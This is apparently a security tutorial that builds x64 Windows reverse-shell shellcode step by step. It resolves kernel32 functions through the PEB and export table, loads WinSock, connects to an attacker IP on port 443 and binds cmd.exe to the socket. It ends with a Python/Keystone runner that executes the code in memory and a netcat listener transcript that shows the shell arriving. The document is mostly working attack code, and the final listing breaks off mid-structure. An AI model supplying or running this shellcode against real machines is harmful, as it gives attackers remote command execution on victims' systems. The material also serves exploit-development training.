Windows x64 Reverse Shellcode

Previously, we looked at WinExec shellcode. In this article, we’re going to be writing shellcode to connect back to an attacker system and provide command line access to the victim host.

Four steps are needed to do this:

Find GetProcAddress
Locate the Kernel32 Base Address
Parse the Kernel32 Export Address Table
Look up the GetProcAddress function pointer

Load the WinSock DLL
Execute GetProcAddress to find the address of LoadLibraryA.
Use LoadLibraryA to load WS2_32.DLL (the DLL needed to create a network socket)

Create a Socket Connection
Lookup the WSAStartup address (needed to initiate usage of WinSock by a process)
Call WSAStartup
Lookup the WSASocketA Address and call the function to spawn a socket
Lookup and call WSAConnect

Spawn cmd.exe connected to the socket
Lookup the address of CreateProcessA.
Create the STARTUPINFOA structure for use with CreateProcessA, setting STD INPUT/OUTPUT/ERROR to our socket handle.
Call CreateProcessA.


String Operations

I wrote the following script to deal with little endian string encoding, which is certainly better than manually encoding characters!

import binascii
import argparse

def encodeCommand(command):
    """Print ``mov rax`` / ``push rax;`` pairs that build *command* on the stack.

    The text is cut into 8-byte groups. The groups are emitted last-to-first
    and the bytes inside each group are reversed, so that once every pair has
    executed the string reads forwards in memory starting at RSP (little-endian
    stores, stack growing downwards).

    Args:
        command: Text to encode. Every character must fit in a single byte
            (code points 0-255).

    Raises:
        ValueError: If *command* contains a character above U+00FF, which
            cannot be represented as one byte.

    Note:
        A final group shorter than 8 bytes leaves the upper bytes of RAX zero,
        which provides the string's NUL terminator. When ``len(command)`` is an
        exact multiple of 8 no terminator is emitted by this function.
    """
    # latin-1 maps code points 0-255 to the identical byte value, which is the
    # one-byte-per-character model the emitted immediates rely on.
    try:
        raw = command.encode("latin-1")
    except UnicodeEncodeError as err:
        raise ValueError(
            "text to encode must contain only single-byte characters"
        ) from err

    qword = 8
    groups = [raw[i:i + qword] for i in range(0, len(raw), qword)]

    # Tail of the string is pushed first so the head ends up at the lowest
    # address (the final RSP).
    for group in reversed(groups):
        print("mov rax, 0x" + group[::-1].hex())
        print("push rax;")


# Command-line entry point: -t/--text (required) supplies the string to encode.
argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--text", help="text to encode", required=True)
args = argParser.parse_args()
# Prints the generated mov/push pairs for the supplied text to stdout.
encodeCommand(args.text)

The below output shows the WSAStartup string being encoded.

PS C:\Users\user\Desktop> python3 .\little_endian_converter.py -t WSAStartup
mov rax, 0x7075
push rax;
mov rax, 0x7472617453415357
push rax;

Find GetProcAddress

I won’t be covering the process in depth here, since it’s basically the same steps from the previous article. We start by locating the base address of Kernel32.dll, then parse the export address table to find the GetProcAddress pointer.

    " start: "
    "  add rsp, 0xfffffffffffffdf8;"    # Avoid Null Byte
    " locate_kernel32:"
    "   xor rcx, rcx;"                  # Zero RCX contents
    "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
    "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
    "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
    "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
    "   xchg rax, rsi;"                 # Swap RAX,RSI
    "   lodsq;"                         # Load qword at address (R)SI into RAX
    "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
    "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

    # Code for parsing Export Address Table
    "   mov ebx, [rbx+0x3C]; "          # Get Kernel32 PE Signature (offset 0x3C) into EBX
    "   add rbx, r8; "                  # Add defrerenced signature offset to kernel32 base. Store in RBX.
    "   xor r12,r12;"
    "   add r12, 0x88FFFFF;"
    "   shr r12, 0x14;"
    "   mov edx, [rbx+r12];"            # Offset from PE32 Signature to Export Address Table
    
    "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
    "   mov r10d, [rdx+0x14];"          # Number of functions
    "   xor r11, r11;"                  # Zero R11 before use
    "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
    "   add r11, r8;"                   # AddressOfNames VMA

    # Loop over Export Address Table to find GetProcAddress Name
    "   mov rcx, r10;"                  # Set loop counter
    "kernel32findfunction: "
    " jecxz FunctionNameFound;"         # Loop around this function until we find WinExec
    "   xor ebx,ebx;"                   # Zero EBX for use
    "   mov ebx, [r11+4+rcx*4];"        # EBX = RVA for first AddressOfName
    "   add rbx, r8;"                   # RBX = Function name VMA
    "   dec rcx;"                       # Decrement our loop by one
    "   mov rax, 0x41636f7250746547;"   # GetProcA
    "   cmp [rbx], rax;"                # Check if we found GetProcA
    "   jnz kernel32findfunction;"

    "FunctionNameFound: "               # Find GetProcessAddress
    # We found our target
    "   xor r11, r11;"
    "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
    "   add r11, r8;"                   # AddressOfNameOrdinals VMA
    # Get the function ordinal from AddressOfNameOrdinals
    "   inc rcx;"
    "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter
    # Get function address from AddressOfFunctions
    "   xor r11, r11;"
    "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
    "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
    "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
    "   add rax, r8;"                   # Add base address to function RVA
    "   mov r14, rax;"                  # GetProcAddress to R14

Pausing execution after the code runs shows the R14 register now contains the address of GetProcAddress.

0:008> r r14
r14=00007ffa4b0e9b70
0:008> x kernel32!GetProcAddress*
00007ffa`4b0e9b70 KERNEL32!GetProcAddressStub (GetProcAddressStub)

Load the WinSock DLL

Next, we want to find the address of LoadLibraryA to load the WinSock library.

Since GetProcAddress is currently stored in the non-volatile register R14, we just need to call it, supplying the module base address (in this case the previously resolved Kernel32 base) and the name of the function. Below is the function’s signature:

FARPROC GetProcAddress(
  [in] HMODULE hModule,
  [in] LPCSTR  lpProcName
);

Below shows how we find the address of LoadLibraryA using GetProcAddress.

    # Below to resolve LoadLibraryA using GetProcAddress
    " mov rcx, 0x41797261; "
    " push rcx; "
    " mov rcx, 0x7262694c64616f4c; "
    " push rcx; "
    " mov rdx, rsp; "                    # LoadLibraryA into RDX
    " mov rcx, r8; "                     # Copy Kernel32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
    " mov rsi, rax; "                    # Save the address of loadlibrary in RSI

    # Call LoadLibraryA on WS2_32.DLL 
    " xor rax, rax;"
    " mov rax, 0x6C6C; "             # ll
    " push rax;"
    " mov rax, 0x642E32335F325357;"  # WS2_32.d
    " push rax;"
    " mov rcx, rsp;"                 # copy stack string to RCX
    " sub rsp, 0x30;"
    " call rsi;"                     # Call LoadLibraryA
    " mov r15, rax;"
    " add rsp, 0x30;"                # Clean allocated space on stack
    " add rsp, 0x10;"                # Clean space for ws2_32.dll

Finally, we can call LoadLibraryA on WS2_32.DLL to ensure it’s loaded in the program’s virtual address space. The function only takes one parameter, which is the name of the library to be loaded:

HMODULE LoadLibraryA(
  [in] LPCSTR lpLibFileName
);
       # Call LoadLibraryA on WS2_32.DLL 
       " xor rax, rax;"
       " mov rax, 0x6C6C; "             # ll
       " push rax;"
       " mov rax, 0x642E32335F325357;"  # WS2_32.d
       " push rax;"
       " mov rcx, rsp;"                 # copy stack string to RCX
       " sub rsp, 0x30;"
       " call rsi;"                     # Call LoadLibraryA
       " mov r15, rax;"
       " add rsp, 0x30;"                # Clean allocated space on stack
       " add rsp, 0x10;"                # Clean space for ws2_32.dll

Create a Socket Connection

First, we need to call WSAStartup. The WSAStartup function initiates use of the Winsock DLL by a process. We only need to supply the version (2.2) and a pointer to an area in memory where a WSADATA structure will be stored.

int WSAStartup(
        WORD      wVersionRequired, # 0x0202 == Version 2.2
  [out] LPWSADATA lpWSAData         # Pointer to where a WSADATA structure will be populated
);
    # Get WSAStartup Address
    " mov rax, 0x7075;"
    " push rax;"
    " mov rax, 0x7472617453415357;"
    " push rax;"
    " mov rdx, rsp; "                    # WSAStartup into RDX
    " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
    " mov r12, rax; "                    # Save the address of WSAStartup in RSI

    # Call WSAStartup
    " xor rcx,rcx; "
    " mov cx,408; "
    " sub rsp,rcx; "
    " lea rdx,[rsp]; "                    # lpWSAData
    " mov cx,514; "                       # wVersionRequired
    " sub rsp,88; "
    " call r12; "                         # Call WSAStartup

Next, we call WSASocketA. Below shows the method signature and the values we want to populate.

SOCKET WSAAPI WSASocketA(
  [in] int                 af,              # RCX   (AF_INET == 2)
  [in] int                 type,            # RDX   (SOCK_STREAM == 1)
  [in] int                 protocol,        # R8    (IPPROTO_TCP == 6)
  [in] LPWSAPROTOCOL_INFOA lpProtocolInfo,  # R9    (NULL)
  [in] GROUP               g,               # Stack (NULL)
  [in] DWORD               dwFlags          # Stack (NULL)
);

The function can be called using the following code;

    # Create a socket with WSASocketA
    " sub rsp,0x208;"
    " xor rdx, rdx;"
    " sub rsp, 88;"
    " mov [rsp+32], rdx;"
    " mov [rsp+40], rdx;"
    " inc rdx;"
    " mov rcx, rdx;"
    " inc rcx;"
    " xor r8,r8;"
    " add r8,6;"
    " xor r9,r9;"
    " mov r9w,98*4;"
    " mov ebx,[r15+r9];"
    " xor r9,r9;"
    " call r12;"
    " mov r13, rax;"
    " add rsp, 0x208;"

This results in our register and stack values being set correctly;

0:008> r
rax=00007ffa4b1a4850 rbx=0000000000051a1c rcx=0000000000000002
rdx=0000000000000001 rsi=00007ffa4b0efcc0 rdi=0000000000000000
rip=00000117fef70194 rsp=000000011456f730 rbp=0000000000000000
 r8=0000000000000006  r9=0000000000000000 r10=0000000000000055
r11=000000011456f630 r12=00007ffa4b1a4850 r13=00000000000002c3
r14=00007ffa4b0e9b70 r15=00007ffa4b190000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             
0:008> dq rsp L2
00000001`1456f730  00000000`00000000 00000000`00000000

Next, we need to call WSAConnect. We provide this function the IP address and port of the system we want to connect to.

int WSAAPI WSAConnect(
  [in]  SOCKET         s,
  [in]  const sockaddr *name,
  [in]  int            namelen,
  [in]  LPWSABUF       lpCallerData,
  [out] LPWSABUF       lpCalleeData,
  [in]  LPQOS          lpSQOS,
  [in]  LPQOS          lpGQOS
);

Formatting the IP address and port can be done using WinDBG.

       # IP Address Calculations
        0:008> ? 0n192
        Evaluate expression: 192 = 00000000`000000c0
        0:008> ? 0n168
        Evaluate expression: 168 = 00000000`000000a8
        0:008> ? 0n1
        Evaluate expression: 1 = 00000000`00000001
        0:008> ? 0n193
        Evaluate expression: 193 = 00000000`000000c1

       # 192.168.1.193  = 0xc101a8c0

        0:008> ? 0n443
        Evaluate expression: 443 = 00000000`000001bb
        Port 443 = 0xbb01 

Once again, we find the function’s address using GetProcAddress.

       # Lookup WSAConnect Address
       " mov rax, 0x7463;"
       " push rax;"
       " mov rax, 0x656e6e6f43415357;"
       " push rax;"                         # WSAConnect
       " mov rdx, rsp; "                    # WSAConnect into RDX
       " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
       " sub rsp, 0x30; "                   # Make some room on the stack
       " call r14;"                         # Call GetProcessAddress
       " add rsp, 0x30; "                   # Remove allocated stack space
       " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
       " mov r12, rax; "                    # Save the address of WSAConnect in R12

Then call the function to make a connection.

       " mov rcx, r13;"          # Our socket handle as parameter 1
       " sub rsp,0x208;"         # Make some room on the stack
       " xor rax,rax;"
       " inc rax; "
       " inc rax; "
       " mov [rsp], rax;"         # AF_INET = 2
       " mov rax, 0xbb01;"        # Port
       " mov [rsp+2], rax; "      # Port
       " mov rax, 0xc101a8c0;"    # IP 
       " mov [rsp+4], rax ;"      # IP
       " lea rdx,[rsp];"          # Save our pointer to RDX
       " mov r8, 0x16; "          # Move 0x10 to namelen
       " xor r9,r9;"              
       " push r9;"                # NULL lpCallerData
       " push r9;"                # NULL lpCallerData
       " push r9;"                # NULL lpSQOS
       " sub rsp, 0x88; "         # NULL lpSQOS
       " call r12;"               # Call WSAConnect

Spawn cmd.exe Connected to the Socket

With the socket established, we just need to call CreateProcessA to execute cmd.exe, and set its input/output handles to our established socket.

    # Find CreateProcessA address in kernel32.dll
    # Lookup Kernel32 base address again...
    " xor rcx, rcx;"                  # Zero RCX contents
    " mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
    " mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
    " mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
    " lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
    " xchg rax, rsi;"                 # Swap RAX,RSI
    " lodsq;"                         # Load qword at address (R)SI into RAX
    " mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
    " mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

    # Find address for CreateProcessA. Store in R12 (previously stored WSAConnect)
    " mov rax, 0x41737365636f;"
    " push rax;"
    " mov rax, 0x7250657461657243;"
    " push rax;"                         # CreateProcessA
    " mov rdx, rsp; "                    # CreateProcessA into RDX
    " mov rcx, r8; "                     # Copy Kernel32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcessAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated CreateProcessA string
    " mov r12, rax; "                    # Save the address of CreateProcessA in R12

Get a pointer to the string cmd.exe, and create a STARTUPINFOA structure.

typedef struct _STARTUPINFOA {
  DWORD  cb;
  LPSTR  lpReserved;
  LPSTR  lpDesktop;
  LPSTR  lpTitle;
  DWORD  dwX;
  DWORD  dwY;
  DWORD  dwXSize;
  DWORD  dwYSize;
  DWORD  dwXCountChars;
  DWORD  dwYCountChars;
  DWORD  dwFillAttribute;
  DWORD  dwFlags;
  WORD   wShowWindow;
  WORD   cbReserved2;
  LPBYTE lpReserved2;
  HANDLE hStdInput;
  HANDLE hStdOutput;
  HANDLE hStdError;
} STARTUPINFOA, *LPSTARTUPINFOA;

    # Push cmd.exe string to stack
    " mov rax, 0x6578652e646d63; "
    " push rax; "
    " mov rcx, rsp; "                # RCX = lpApplicationName (cmd.exe)


    # STARTUPINFOA Structure
    " push r13;"                     # Push STDERROR
    " push r13;"                     # Push STDOUTPUT
    " push r13;"                     # Push STDINPUT
    " xor rax,rax; "
    " push ax;"
    " push rax;"
    " push rax;"
    " mov rax, 0x100;"
    " push ax;"
    " xor rax,rax;"
    " push ax;"
    " push ax;"
    " push rax;"
    " push rax; "                    # dwXSize = NULL
    " push rax; "                    # dwY = NULL
    " push rax; "                    # dwX = NULL
    " push rax; "                    # lpDesktop = NULL
    " push rax; "                    # lpReserved = NULL
    " mov rax, 0x68;"                
    " push rax;"                     # SizeOfStruct = 0x68
    " mov rdi,rsp;"                  # Copy the Pointer to RDI

Examining the structure using WinDBG shows it’s correctly formatted.

# 0:009> dt STARTUPINFOA [rsp]
# combase!STARTUPINFOA
#    +0x000 cb               : 0x68
#    +0x008 lpReserved       : (null) 
#    +0x010 lpDesktop        : (null) 
#    +0x018 lpTitle          : (null) 
#    +0x020 dwX              : 0
#    +0x024 dwY              : 0
#    +0x028 dwXSize          : 0
#    +0x02c dwYSize          : 0
#    +0x030 dwXCountChars    : 0
#    +0x034 dwYCountChars    : 0
#    +0x038 dwFillAttribute  : 0
#    +0x03c dwFlags          : 0x100
#    +0x040 wShowWindow      : 0
#    +0x042 cbReserved2      : 0
#    +0x048 lpReserved2      : (null) 
#    +0x050 hStdInput        : (null) 
#    +0x058 hStdOutput       : 0x00000000`000000a4 Void
#    +0x060 hStdError        : 0x00000000`000000a4 Void

Finally, call CreateProcessA to start cmd.exe.

BOOL CreateProcessA(
  [in, optional]      LPCSTR                lpApplicationName,
  [in, out, optional] LPSTR                 lpCommandLine,
  [in, optional]      LPSECURITY_ATTRIBUTES lpProcessAttributes,
  [in, optional]      LPSECURITY_ATTRIBUTES lpThreadAttributes,
  [in]                BOOL                  bInheritHandles,
  [in]                DWORD                 dwCreationFlags,
  [in, optional]      LPVOID                lpEnvironment,
  [in, optional]      LPCSTR                lpCurrentDirectory,
  [in]                LPSTARTUPINFOA        lpStartupInfo,
  [out]               LPPROCESS_INFORMATION lpProcessInformation
);
    # Call CreateProcessA
    " mov rax, rsp;"                # Get current stack pointer
    " sub rax, 0x500;"
    " push rax; "                   # ProcessInfo
    " push rdi; "                   # StartupInfo          = Pointer to STARTUPINFOA
    " xor rax, rax; "
    " push rax; "                   # lpCurrentDirectory   = NULL
    " push rax; "                   # lpEnvironment        = NULL
    " push rax;"                    
    " inc rax;  "
    " push rax; "                   # bInheritHandles      = 1
    " xor rax, rax; "
    " push rax;"
    " push rax;"
    " push rax;"
    " push rax; "                   # dwCreationFlags      = NULL
    " mov r8, rax; "                # lpThreadAttributes   = NULL              
    " mov r9, rax; "                # lpProcessAttributes  = NULL              
    " mov rdx, rcx; "               # lpCommandLine        = "cmd.exe" string  
    " mov rcx, rax; "               # lpApplicationName    = NULL              
    " call r12; "                   # Call CreateProcessA

With everything in place, our code should now be able to connect back to an attacker system with a command prompt;

┌──(root㉿kali)-[~]
└─# nc -nvv -p 443 -l
listening on [any] 443 ...
connect to [192.168.1.193] from (UNKNOWN) [192.168.1.213] 54111
Microsoft Windows [Version 10.0.22000.1335]
(c) Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>

Closing Thoughts

  • The opcode generated is around 715 bytes, which is quite large. This could be improved by implementing functions to perform address lookups, rather than repeating the same process each time. In addition, instead of using GetProcAddress, we could manually traverse the Export Address Table of each DLL to locate function pointers.
  • The code currently contains NULL bytes. These could be removed through a similar process performed in the last article.

Finished Code Listing

import ctypes, struct
import binascii
import os
import subprocess
from keystone import *

#####################################################################################
# ██████╗░░█████╗░██████╗░██████╗░███████╗██████╗░░██████╗░░█████╗░████████╗███████╗#
# ██╔══██╗██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗██╔════╝░██╔══██╗╚══██╔══╝██╔════╝#
# ██████╦╝██║░░██║██████╔╝██║░░██║█████╗░░██████╔╝██║░░██╗░███████║░░░██║░░░█████╗░░#
# ██╔══██╗██║░░██║██╔══██╗██║░░██║██╔══╝░░██╔══██╗██║░░╚██╗██╔══██║░░░██║░░░██╔══╝░░#
# ██████╦╝╚█████╔╝██║░░██║██████╔╝███████╗██║░░██║╚██████╔╝██║░░██║░░░██║░░░███████╗#
# ╚═════╝░░╚════╝░╚═╝░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝░╚═════╝░╚═╝░░╚═╝░░░╚═╝░░░╚══════╝#
#####################################################################################
#                        x64 Reverse Shell Shellcode                                #
#####################################################################################


def main():
    """Assemble the listing with Keystone and run it inside this process.

    The assembly text in ``SHELLCODE`` is assembled for x86-64, printed as an
    escaped byte string together with its length, copied into a newly
    allocated memory region and started on a new thread. WinDbgX is launched
    against the current process first, and the function waits for a key press
    before continuing. Windows-only: it relies on ``ctypes.windll``.
    """
    SHELLCODE = (
    " start: "
    "  add rsp, 0xfffffffffffffdf8;"    # RSP -= 0x208, written as an add of the two's complement to avoid null bytes
    " locate_kernel32:"
    "   xor rcx, rcx;"                  # Zero RCX contents
    "   mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
    "   mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
    "   mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
    "   lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
    "   xchg rax, rsi;"                 # Swap RAX,RSI
    "   lodsq;"                         # Load qword at address (R)SI into RAX
    "   mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
    "   mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

    # Code for parsing Export Address Table
    "   mov ebx, [rbx+0x3C]; "          # EBX = dword at offset 0x3C of the image (offset of the PE signature)
    "   add rbx, r8; "                  # Add dereferenced signature offset to kernel32 base. Store in RBX.
    "   xor r12,r12;"
    "   add r12, 0x88FFFFF;"
    "   shr r12, 0x14;"                 # R12 = 0x88 (0x88FFFFF >> 0x14)
    "   mov edx, [rbx+r12];"            # Offset from PE32 Signature to Export Address Table
    
    "   add rdx, r8;"                   # RDX = kernel32.dll + RVA ExportTable = ExportTable Address
    "   mov r10d, [rdx+0x14];"          # Number of functions
    "   xor r11, r11;"                  # Zero R11 before use
    "   mov r11d, [rdx+0x20];"          # AddressOfNames RVA
    "   add r11, r8;"                   # AddressOfNames VMA

    # Loop over Export Address Table to find GetProcAddress Name
    "   mov rcx, r10;"                  # Set loop counter
    "kernel32findfunction: "
    " jecxz FunctionNameFound;"         # Leave the loop once the counter reaches zero
    "   xor ebx,ebx;"                   # Zero EBX for use
    "   mov ebx, [r11+4+rcx*4];"        # EBX = name RVA read from AddressOfNames at index RCX + 1
    "   add rbx, r8;"                   # RBX = Function name VMA
    "   dec rcx;"                       # Decrement our loop by one
    "   mov rax, 0x41636f7250746547;"   # GetProcA
    "   cmp [rbx], rax;"                # Check if we found GetProcA
    "   jnz kernel32findfunction;"      # No match: try the next name

    "FunctionNameFound: "               # Resolve the GetProcAddress pointer
    # We found our target
    "   xor r11, r11;"
    "   mov r11d, [rdx+0x24];"          # AddressOfNameOrdinals RVA
    "   add r11, r8;"                   # AddressOfNameOrdinals VMA
    # Get the function ordinal from AddressOfNameOrdinals
    "   inc rcx;"                       # Undo the decrement made inside the loop
    "   mov r13w, [r11+rcx*2];"         # AddressOfNameOrdinals + Counter. RCX = counter
    # Get function address from AddressOfFunctions
    "   xor r11, r11;"
    "   mov r11d, [rdx+0x1c];"          # AddressOfFunctions RVA
    "   add r11, r8;"                   # AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
    "   mov eax, [r11+4+r13*4];"        # Get the function RVA.
    "   add rax, r8;"                   # Add base address to function RVA
    "   mov r14, rax;"                  # GetProcAddress to R14

    # Below to resolve LoadLibraryA using GetProcAddress
    " mov rcx, 0x41797261; "             # "aryA"
    " push rcx; "
    " mov rcx, 0x7262694c64616f4c; "     # "LoadLibr"
    " push rcx; "
    " mov rdx, rsp; "                    # RDX = pointer to the "LoadLibraryA" string (lpProcName)
    " mov rcx, r8; "                     # Copy Kernel32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated LoadLibrary string
    " mov rsi, rax; "                    # Save the address of loadlibrary in RSI

    # Call LoadLibraryA on WS2_32.DLL 
    " xor rax, rax;"
    " mov rax, 0x6C6C; "             # ll
    " push rax;"
    " mov rax, 0x642E32335F325357;"  # WS2_32.d
    " push rax;"
    " mov rcx, rsp;"                 # copy stack string to RCX
    " sub rsp, 0x30;"
    " call rsi;"                     # Call LoadLibraryA
    " mov r15, rax;"                 # R15 = value returned by LoadLibraryA (used below as the WS2_32 base)
    " add rsp, 0x30;"                # Clean allocated space on stack
    " add rsp, 0x10;"                # Clean space for ws2_32.dll
    
    # Get WSAStartup Address
    " mov rax, 0x7075;"                  # "up"
    " push rax;"
    " mov rax, 0x7472617453415357;"      # "WSAStart"
    " push rax;"
    " mov rdx, rsp; "                    # WSAStartup into RDX
    " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove allocated WSAStartup string
    " mov r12, rax; "                    # Save the address of WSAStartup in R12

    " int3;"                              # Software breakpoint: stops in the attached debugger before WSAStartup is called
    # Call WSAStartup
    " xor rcx,rcx; "
    " mov cx,408; "                       # 408 bytes of stack for the WSADATA output buffer
    " sub rsp,rcx; "
    " lea rdx,[rsp]; "                    # lpWSAData [out]
    " mov cx,514; "                       # wVersionRequired = 514 (0x0202, version 2.2)
    " sub rsp,88; "                       # Reserve a further 88 bytes of stack before the call
    " call r12; "                         # Call WSAStartup

    # Lookup WSASocketA Address
    " mov rax, 0x4174;"                  # "tA"
    " push rax;"
    " mov rax, 0x656b636f53415357;"      # "WSASocke"
    " push rax;"                         # WSASocketA
    " mov rdx, rsp; "                    # WSASocketA into RDX
    " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove allocated WSASocketA string
    " mov r12, rax; "                    # Save the address of WSASocketA in R12

    # Create a socket with WSASocketA
    " sub rsp,0x208;"                    # Scratch space on the stack
    " xor rdx, rdx;"
    " sub rsp, 88;"
    " mov [rsp+32], rdx;"                # 5th argument (g) = 0
    " mov [rsp+40], rdx;"                # 6th argument (dwFlags) = 0
    " inc rdx;"                          # RDX = type = 1 (SOCK_STREAM)
    " mov rcx, rdx;"
    " inc rcx;"                          # RCX = af = 2 (AF_INET)
    " xor r8,r8;"
    " add r8,6;"                         # R8 = protocol = 6 (IPPROTO_TCP)
    " xor r9,r9;"
    " mov r9w,98*4;"
    " mov ebx,[r15+r9];"                 # Loads the dword at R15 + 392 into EBX. NOTE(review): EBX is not read again in this listing - confirm this is needed
    " xor r9,r9;"                        # R9 = lpProtocolInfo = NULL
    " call r12;"                         # Call WSASocketA
    " mov r13, rax;"                     # R13 = socket handle returned by WSASocketA
    " add rsp, 0x208;"                   # Release the 0x208-byte scratch area

    # Lookup WSAConnect Address
    " mov rax, 0x7463;"                  # "ct"
    " push rax;"
    " mov rax, 0x656e6e6f43415357;"      # "WSAConne"
    " push rax;"                         # WSAConnect
    " mov rdx, rsp; "                    # WSAConnect into RDX
    " mov rcx, r15; "                    # Copy WS2_32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove allocated WSAConnect string
    " mov r12, rax; "                    # Save the address of WSAConnect in R12

    # Call WSAConnect...
    " mov rcx, r13;"          # Our socket handle as parameter 1
    " sub rsp,0x208;"         # Make some room on the stack
    " xor rax,rax;"
    " inc rax; "
    " inc rax; "
    " mov [rsp], rax;"         # Address family: AF_INET = 2
    " mov rax, 0xbb01;"        # Port 443 (0x01bb) byte-swapped so it is stored in network byte order
    " mov [rsp+2], rax; "      # Port field at offset 2
    " mov rax, 0xce01a8c0;"    # IPv4 address bytes c0.a8.01.ce = 192.168.1.206
    " mov [rsp+4], rax ;"      # Address field at offset 4
    " lea rdx,[rsp];"          # Save our pointer to RDX
    " mov r8, 0x16; "          # namelen = 0x16. NOTE(review): sizeof(sockaddr_in) is 0x10 - confirm the intended value
    " xor r9,r9;"              # R9 = lpCallerData = NULL
    " push r9;"                # Zero qword (presumably intended for lpCalleeData)
    " push r9;"                # Zero qword (presumably intended for lpSQOS)
    " push r9;"                # Zero qword (presumably intended for lpGQOS)
    " sub rsp, 0x88; "         # Reserve 0x88 bytes of stack before the call
    " call r12;"               # Call WSAConnect

    # Find CreateProcessA address in kernel32.dll
    # Lookup Kernel32 base address again...
    " xor rcx, rcx;"                  # Zero RCX contents
    " mov rax, gs:[rcx + 0x60];"      # 0x060 ProcessEnvironmentBlock to RAX.
    " mov rax, [rax + 0x18];"         # 0x18  ProcessEnvironmentBlock.Ldr Offset
    " mov rsi, [rax + 0x20];"         # 0x20 Offset = ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList
    " lodsq;"                         # Load qword at address (R)SI into RAX (ProcessEnvironmentBlock.Ldr.InMemoryOrderModuleList)
    " xchg rax, rsi;"                 # Swap RAX,RSI
    " lodsq;"                         # Load qword at address (R)SI into RAX
    " mov rbx, [rax + 0x20] ;"        # RBX = Kernel32 base address
    " mov r8, rbx; "                  # Copy Kernel32 base address to R8 register

    # Find address for CreateProcessA. Store in R12 (previously stored WSAConnect)
    " mov rax, 0x41737365636f;"          # "ocessA"
    " push rax;"
    " mov rax, 0x7250657461657243;"      # "CreatePr"
    " push rax;"                         # CreateProcessA
    " mov rdx, rsp; "                    # CreateProcessA into RDX
    " mov rcx, r8; "                     # Copy Kernel32 base address to RCX
    " sub rsp, 0x30; "                   # Make some room on the stack
    " call r14;"                         # Call GetProcAddress
    " add rsp, 0x30; "                   # Remove allocated stack space
    " add rsp, 0x10; "                   # Remove Allocated CreateProcessA string
    " mov r12, rax; "                    # Save the address of CreateProcessA in R12

    # Push cmd.exe string to stack
    " mov rax, 0x6578652e646d63; "   # "cmd.exe"
    " push rax; "
    " mov rcx, rsp; "                # RCX = pointer to the "cmd.exe" string (moved to RDX as lpCommandLine below)


    # STARTUPINFOA Structure (built top-down; offsets are relative to the final RSP)
    " push r13;"                     # +0x60 hStdError  = socket handle
    " push r13;"                     # +0x58 hStdOutput = socket handle
    " push r13;"                     # +0x50 hStdInput  = socket handle
    " xor rax,rax; "
    " push ax;"                      # +0x4e  \
